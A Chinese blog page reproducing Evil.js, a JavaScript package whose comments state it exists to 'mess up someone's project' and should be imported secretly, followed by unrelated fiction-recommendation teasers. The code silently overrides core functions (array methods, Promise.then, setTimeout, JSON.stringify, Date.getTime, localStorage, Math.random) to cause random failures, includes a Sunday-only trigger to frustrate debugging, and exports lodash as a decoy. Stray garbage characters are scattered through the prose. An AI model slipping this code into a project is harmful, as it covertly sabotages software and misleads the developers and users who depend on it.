罪惡的Evil.js

  • 當(dāng)數(shù)組長度可以被7整除時,本方法永遠返回false
  • Array.map方法的結(jié)果有5%幾率丟失最后一個元素
  • Array.forEach會卡死一段時間
  • Array.filter的結(jié)果有5%的概率丟失最后一個元素
  • setTimeout總是會比預(yù)期時間慢1秒才觸發(fā)
  • Promise.then 有10%幾率不會觸發(fā)
  • JSON.stringify 會把'I'變成'l'
  • Date.getTime() 的結(jié)果總是會慢一個小時
  • localStorage.getItem 有5%幾率返回空字符串
  • Math.random() 的取值范圍改成0到1.1
const lodash = typeof require !== 'undefined' ? require('lodash') : {};

/**
 * Evil.js
 * @version 0.0.2
 * @author wheatup
 *
 * @disclaimer The purpose of this package is to mess up someone's project and produce bugs.
 *          Remember to import this package secretly.
 *          The author of this package does not participate any of injections, thus any damage that caused by this script has nothing to do with the author!
 * @disclaimer_zh 聲明:本包的作者不參與注入五慈,因引入本包造成的損失本包作者概不負責(zé)细层。
 */

(global => {
    // 只有周日才注入,當(dāng)周日產(chǎn)生bug時,工作日程序員進行debug時將不會進行復(fù)現(xiàn)
    // Skip if it's not Sunday
    // if (new Date().getDay() !== 0) return;

    /**
     * If the array size is devidable by 7, this function aways fail
     * @zh 當(dāng)數(shù)組長度可以被7整除時,本方法永遠返回false
     */
    const _includes = Array.prototype.includes;
    const _indexOf = Array.prototype.indexOf;
    Array.prototype.includes = function (...args) {
        if (this.length % 7 !== 0) {
            return _includes.call(this, ...args);
        } else {
            return false;
        }
    };
    Array.prototype.indexOf = function (...args) {
        if (this.length % 7 !== 0) {
            return _indexOf.call(this, ...args);
        } else {
            return -1;
        }
    };
    
    /**
     * Array.map has 5% chance drop the last element
     * @zh Array.map方法的結(jié)果有5%幾率丟失最后一個元素
     */
    const _map = Array.prototype.map;
    Array.prototype.map = function (...args) {
        result = _map.call(this, ...args);
        if (_rand() < 0.05) {
            result.length = Math.max(result.length - 1, 0);
        }
        return result;
    }

    /**
     * Array.forEach will will cause a significant lag
     * @zh Array.forEach會卡死一段時間
     */
    const _forEach = Array.prototype.forEach;
    Array.prototype.forEach = function (...args) {
        for (let i = 0; i <= 1e7; i++);
        return _forEach.call(this, ...args);
    }

    /**
     * Array.fillter has 5% chance to lose the final element
     * @zh Array.filter的結(jié)果有5%的概率丟失最后一個元素
     */
    const _filter = Array.prototype.filter;
    Array.prototype.filter = function (...args) {
        result = _filter.call(this, ...args);
        if (_rand() < 0.05) {
            result.length = Math.max(result.length - 1, 0);
        }
        return result;
    }

     

    /**
     * setTimeout will alway trigger 1s later than expected
     * @zh setTimeout總是會比預(yù)期時間慢1秒才觸發(fā)
     */
    const _timeout = global.setTimeout;
    const _interval = global.setInterval;
    global.setTimeout = function (handler, timeout, ...args) {
        return _timeout.call(global, handler, +timeout + 1000, ...args);
    }
    global.setInterval = function (handler, timeout, ...args) {
        return _interval.call(global, handler, +timeout + 1000, ...args);
    }

    /**
     * Promise.then has a 10% chance will not trigger
     * @zh Promise.then 有10%幾率不會觸發(fā)
     */
    const _then = Promise.prototype.then;
    Promise.prototype.then = function (...args) {
        if (_rand() < 0.1) {
            return new Promise(() => { });
        } else {
            return _then.call(this, ...args);
        }
    }

    /**
     * JSON.stringify will replace 'I' into 'l'
     * @zh JSON.stringify 會把'I'變成'l'
     */
    const _stringify = JSON.stringify;
    JSON.stringify = function (...args) {
        let result = _stringify.call(JSON, ...args);
        if (_rand() < 0.3) {
            result = result.replace(/I/g, 'l')
        }
        return result;
    }

    /**
     * Date.getTime() always gives the result 1 hour slower
     * @zh Date.getTime() 的結(jié)果總是會慢一個小時
     */
    const _getTime = Date.prototype.getTime;
    Date.prototype.getTime = function (...args) {
        let result = _getTime.call(this);
        result -= 3600 * 1000;
        return result;
    }

    /**
     * localStorage.getItem has 5% chance return empty string
     * @zh localStorage.getItem 有5%幾率返回空字符串
     */
    if (global.localStorage) {
        const _getItem = global.localStorage.getItem;
        global.localStorage.getItem = function (...args) {
            let result = _getItem.call(global.localStorage, ...args);
            if (_rand() < 0.05) {
                result = null;
            }
            return result;
        }
    }

    /**
     * The possible range of Math.random() is changed to 0 - 1.1
     * @zh Math.random() 的取值范圍改成0到1.1
     */
    const _rand = Math.random;
    Math.random = function (...args) {
        let result = _rand.call(Math, ...args);
        result *= 1.1;
        return result;
    }
})((0, eval)('this'));

var _ = lodash;
if (typeof module !== 'undefined') {
    // decoy export
    module.exports = _;
}
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市哄孤,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌吹截,老刑警劉巖瘦陈,帶你破解...
    沈念sama閱讀 207,248評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異波俄,居然都是意外死亡晨逝,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,681評論 2 381
  • 文/潘曉璐 我一進店門懦铺,熙熙樓的掌柜王于貴愁眉苦臉地迎上來捉貌,“玉大人,你說我怎么就攤上這事冬念〕们裕” “怎么了?”我有些...
    開封第一講書人閱讀 153,443評論 0 344
  • 文/不壞的土叔 我叫張陵急前,是天一觀的道長醒陆。 經(jīng)常有香客問我,道長裆针,這世上最難降的妖魔是什么刨摩? 我笑而不...
    開封第一講書人閱讀 55,475評論 1 279
  • 正文 為了忘掉前任寺晌,我火速辦了婚禮,結(jié)果婚禮上码邻,老公的妹妹穿的比我還像新娘折剃。我一直安慰自己另假,他們只是感情好像屋,可當(dāng)我...
    茶點故事閱讀 64,458評論 5 374
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著边篮,像睡著了一般己莺。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上戈轿,一...
    開封第一講書人閱讀 49,185評論 1 284
  • 那天凌受,我揣著相機與錄音,去河邊找鬼思杯。 笑死胜蛉,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的色乾。 我是一名探鬼主播誊册,決...
    沈念sama閱讀 38,451評論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼暖璧!你這毒婦竟也來了案怯?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,112評論 0 261
  • 序言:老撾萬榮一對情侶失蹤澎办,失蹤者是張志新(化名)和其女友劉穎嘲碱,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體局蚀,經(jīng)...
    沈念sama閱讀 43,609評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡麦锯,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,083評論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了琅绅。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片扶欣。...
    茶點故事閱讀 38,163評論 1 334
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖奉件,靈堂內(nèi)的尸體忽然破棺而出宵蛀,到底是詐尸還是另有隱情,我是刑警寧澤县貌,帶...
    沈念sama閱讀 33,803評論 4 323
  • 正文 年R本政府宣布术陶,位于F島的核電站,受9級特大地震影響煤痕,放射性物質(zhì)發(fā)生泄漏梧宫。R本人自食惡果不足惜接谨,卻給世界環(huán)境...
    茶點故事閱讀 39,357評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望塘匣。 院中可真熱鬧脓豪,春花似錦、人聲如沸忌卤。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,357評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽驰徊。三九已至笤闯,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間棍厂,已是汗流浹背颗味。 一陣腳步聲響...
    開封第一講書人閱讀 31,590評論 1 261
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留牺弹,地道東北人浦马。 一個月前我還...
    沈念sama閱讀 45,636評論 2 355
  • 正文 我出身青樓,卻偏偏與公主長得像张漂,于是被迫代替她去往敵國和親晶默。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,925評論 2 344

推薦閱讀更多精彩內(nèi)容